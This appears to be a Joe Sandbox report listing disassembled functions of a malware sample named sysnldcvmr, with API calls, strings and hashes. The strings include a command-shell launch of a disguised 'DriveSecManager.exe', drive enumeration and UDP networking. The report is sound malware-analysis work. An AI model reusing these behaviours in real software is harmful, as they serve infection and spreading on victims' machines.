Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
Instruction ID: 16d4c05c25790a512fd8f3a1e6e85bd280fefa1845e4e3e4af960acff63a7a98
Opcode Fuzzy Hash: d030d70e23b1ee81df40ddde676cc41bbc8b28927f5a1e966705551878972145
Instruction Fuzzy Hash: DE31D1722012059FC310AFB5FD8CAD7B7A8FF44324F04863EE559D3280D778A4449BA9

Function 0040E281 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040E2FC
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E34B
SysFreeString.OLEAUT32(00000000), ref: 0040E35F
SysFreeString.OLEAUT32(00000000), ref: 0040E377

Strings

device, xrefs: 0040E2F3
deviceType, xrefs: 0040E306

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
Instruction ID: b41677b7307b510c0c46b42eeb4edde7184acd44519d028b9e49cf38c7e22350
Opcode Fuzzy Hash: 7884966aedb5b48ec66d747cdb098c486fa550d692640b6eadd274145b97d250
Instruction Fuzzy Hash: 24310C74A0020ADFCB14DF95C884FAFBBB5BF88304F108969E915B7390D778A981CB95

Function 0040E121 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040E19C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040E1EB
SysFreeString.OLEAUT32(00000000), ref: 0040E1FF
SysFreeString.OLEAUT32(00000000), ref: 0040E217

Strings

serviceType, xrefs: 0040E1A6
service, xrefs: 0040E193

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
Instruction ID: ad2fb0e2655c549c540ff47f191a76fdb33d2d75a9b1b61af0e22c3c344479bd
Opcode Fuzzy Hash: 1c5e78dc8b18edf47e620e5ac62898c9c9dab53ef6afcc05c5ff165d884242d4
Instruction Fuzzy Hash: 7B31CD74E0020ADBCB14CFD5D884BAFB7B9BF88304F1085A9E515A7390D7789A41CF95

Function 0040AB80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00416478,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A

Strings

.ou, xrefs: 0040AC4D

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID: .ou
API String ID: 442028454-3683031111
Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59

Function 00407440 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 004074BD
Sleep.KERNEL32(000003E8), ref: 004074EC
wsprintfA.USER32 ref: 00407517
DeleteUrlCacheEntry.WININET(?), ref: 00407527
Sleep.KERNEL32(000DBBA0), ref: 0040756F

Strings

%s%s, xrefs: 0040750B

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
Instruction ID: 516f793b53608c34cc4cf2fa152c24c34b7f811ac1bf05daad4eae6c0a67dd49
Opcode Fuzzy Hash: 78ec990633dcb6ec7f944f4e4d58fe3f4f1b713779a899723d42b03c5855964e
Instruction Fuzzy Hash: DB31FAB0D00218ABCB50DFA9D8887DDBBB4FB08305F1085AAE519B6291D7795AC4CF5A

Function 004063A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063A6
RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
RegCloseKey.ADVAPI32(?), ref: 0040643E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 004063E7
NoDrives, xrefs: 00406418

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
Instruction ID: 69498c8574f0fe75ee0e18bc350880e9ca7d597cc08e8ba402afd13981da7d97
Opcode Fuzzy Hash: 314293f9e134081a44844c09a9b0f17b23a1eb3db84437885ffb7fb3e0008323
Instruction Fuzzy Hash: AC11DD71E4020A9BDB10CFD4D946BEEBBB4FB08708F118159E911B7280D7B85695CF99

Function 0040D160 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D184

Part of subcall function 0040D250: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
Part of subcall function 0040D250: CloseHandle.KERNEL32(?), ref: 0040D2A9

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D1DF
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D21C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D227
DuplicateHandle.KERNEL32(00000000), ref: 0040D22E
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
String ID:
API String ID: 2251373460-0
Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54

Function 00407370 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00407376
srand.MSVCRT ref: 0040737D
rand.MSVCRT ref: 00407385
Sleep.KERNEL32 ref: 00407396
StrChrA.SHLWAPI(00000000,0000007C), ref: 004073BC
Sleep.KERNEL32(000003E8), ref: 004073ED

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Sleep$CountTickrandsrand
String ID:
API String ID: 3488799664-0
Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56

Function 00408EB0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408EBD
_aullshr.NTDLL ref: 00408ECE
_allshl.NTDLL ref: 00408EF0
_aullshr.NTDLL ref: 00408F0C
_allshl.NTDLL ref: 00408F2E
_aullshr.NTDLL ref: 00408F4A

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8

Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
htons.WS2_32(?), ref: 00401281
sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE

Strings

pdu, xrefs: 0040121D

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: ExchangeInterlockedhtonsmemcpysendto
String ID: pdu
API String ID: 2164660128-2320407122
Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7

Function 00406460 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040646B
CoCreateInstance.OLE32(00412438,00000000,00000001,00412418,?), ref: 00406483
wsprintfW.USER32 ref: 004064B6

Strings

/c start %s & start %s\DriveSecManager.exe, xrefs: 004064AA
%comspec%, xrefs: 004064BF

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CreateInitializeInstancewsprintf
String ID: %comspec%$/c start %s & start %s\DriveSecManager.exe
API String ID: 2038452267-3640840557
Opcode ID: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
Instruction ID: 827debbb99fb5d40cfb779b5d8ae5ab415415813199b490bc36420c15ce2df05
Opcode Fuzzy Hash: 4992a1b2003cae7c91a3a7b86177e2a1dc405837f2ddce0001cb864d4f031ccd
Instruction Fuzzy Hash: 0C31D875A40208BFDB04DF98D884FDEB7B5EF88704F208199F619A73A4C674AE81CB54

Function 0040D410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040D429
CloseHandle.KERNEL32(?), ref: 0040D458
LeaveCriticalSection.KERNEL32(?), ref: 0040D467
DeleteCriticalSection.KERNEL32(?), ref: 0040D474

Strings

.ou, xrefs: 0040D458

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterHandleLeave
String ID: .ou
API String ID: 3102160386-3683031111
Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95

Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C

Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B

Strings

pdu, xrefs: 00401339
.ou, xrefs: 0040135C

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu$.ou
API String ID: 309973729-2706015961
Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99

Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 00408A9E
_allshl.NTDLL ref: 00408AAD
_allshl.NTDLL ref: 00408ABC
_allshl.NTDLL ref: 00408ACB
_allshl.NTDLL ref: 00408ADA

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5

Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384

Strings

\??\, xrefs: 00406378

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: DeviceDriveQueryType
String ID: \??\
API String ID: 1681518211-3047946824
Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99

Function 00407310 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,?), ref: 00407338
CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
CloseHandle.KERNEL32(00000000), ref: 00407361

Strings

.ou, xrefs: 00407361

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CloseCreateHandleThreadmemcpy
String ID: .ou
API String ID: 2064604595-3683031111
Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59

Function 0040E770 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
CloseHandle.KERNEL32(000000FF), ref: 0040E7B2

Strings

.ou, xrefs: 0040E7B2

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: File$CloseCreateHandleSize
String ID: .ou
API String ID: 1378416451-3683031111
Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54

Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 0040112B
recvfrom.WS2_32 ref: 0040119C
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
String ID:
API String ID: 3980219359-0
Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
